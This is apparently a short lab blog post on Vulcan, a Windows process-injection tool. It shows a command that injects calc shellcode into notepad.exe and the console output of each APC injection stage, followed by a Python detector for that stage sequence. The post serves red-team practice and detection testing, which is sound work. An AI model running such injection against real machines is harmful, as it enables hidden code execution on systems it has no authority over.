Vulcan Process Injection
Vulcan can perform several different process injection techniques on Windows machines, including DLL Injection, Shellcode Injection, and Process Hollowing. It is a useful tool for the red teamer, allowing custom shellcode to be executed. For the blue teamer, it is a great way to test your defenses.
Prerequisite
- Vulcan
- Windows
- Visual Studio
You will need to compile your own binary. For more information on how to do this, refer to the Vulcan home page 🖖.
Process Injection
With a compiled binary I attempted to run it and got the following.
PS C:\Users\vagrant\vulcan\bin> ./vulcan_x64.exe -m 1500 -i 2 notepad.exe
Using calc x64 shellcode...
[-] Error: Could not find PID (0).
After some trial and error I finally understood this error. What it's saying is that it can't find the process, notepad.exe, I had specified. Running notepad.exe fixed this issue.
C:\lab\vulcan\bin>vulcan_x64.exe -m 1500 -i 2 notepad.exe
Using calc x64 shellcode...
Executing...
[*] Creating process in suspended state
[+] Create process successful!
[*] Allocating memory in process
[+] Memory allocated at: 0xaff40000
[*] Writing shellcode to process
[+] Shellcode is written to memory
[*] Queue APC
[+] QueueAPC is done
[*] Resuming thread....
After that I started playing around with it and found it to work rather well. I highly recommend giving it a try.
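For the blue-team use mentioned at the top, the stage order in the console output above (create suspended, allocate, write, queue APC, resume) can be correlated per process pair. The Python below is an added example, not code from Vulcan or from this post; the event tuples, op names, PIDs and the 10-second window are constructed assumptions standing in for whatever API or EDR telemetry you collect.

```python
from collections import defaultdict

# Stages in the order the tool's console output reports them.
# The op names are a constructed, normalized schema (assumption), not a real EDR format.
STAGES = ["create_suspended", "remote_alloc", "remote_write",
          "queue_apc", "resume_thread"]


def detect_apc_chain(events, window=10.0):
    """Return (actor, target) pairs that ran every stage in order within
    `window` seconds of the suspended create. events: (ts, actor_pid, target_pid, op)."""
    state = defaultdict(lambda: [0, 0.0])  # pair -> [next stage index, chain start ts]
    hits = []
    for ts, actor, target, op in sorted(events):
        s = state[(actor, target)]
        if s[0] and ts - s[1] > window:
            s[0] = 0                      # partial chain outlived the window
        if op == STAGES[0]:
            s[0], s[1] = 1, ts            # (re)start the chain for this pair
        elif s[0] and op == STAGES[s[0]]:
            s[0] += 1
            if s[0] == len(STAGES):
                hits.append((actor, target))
                s[0] = 0
        # Other ops (repeats, unrelated calls) leave the chain where it is.
    return hits


# Constructed sample telemetry: (ts, actor_pid, target_pid, op).
SAMPLE = [
    # pid 4120 creates pid 5300 and walks the whole chain in under a second.
    (1.0, 4120, 5300, "create_suspended"),
    (1.1, 4120, 5300, "remote_alloc"),
    (1.2, 4120, 5300, "remote_write"),
    (1.3, 4120, 5300, "queue_apc"),
    (1.4, 4120, 5300, "resume_thread"),
    # A launcher that only creates suspended and resumes: no alloc/write/APC.
    (2.0, 900, 901, "create_suspended"),
    (2.5, 900, 901, "resume_thread"),
    # Same ops, but the APC is queued before any write: order does not match.
    (3.0, 700, 701, "create_suspended"),
    (3.1, 700, 701, "queue_apc"),
    (3.2, 700, 701, "remote_alloc"),
    (3.3, 700, 701, "remote_write"),
    (3.4, 700, 701, "resume_thread"),
]

if __name__ == "__main__":
    print(detect_apc_chain(SAMPLE))
```

Running Vulcan in a lab while collecting your own telemetry is a direct way to check whether a rule of this shape fires on the real sequence.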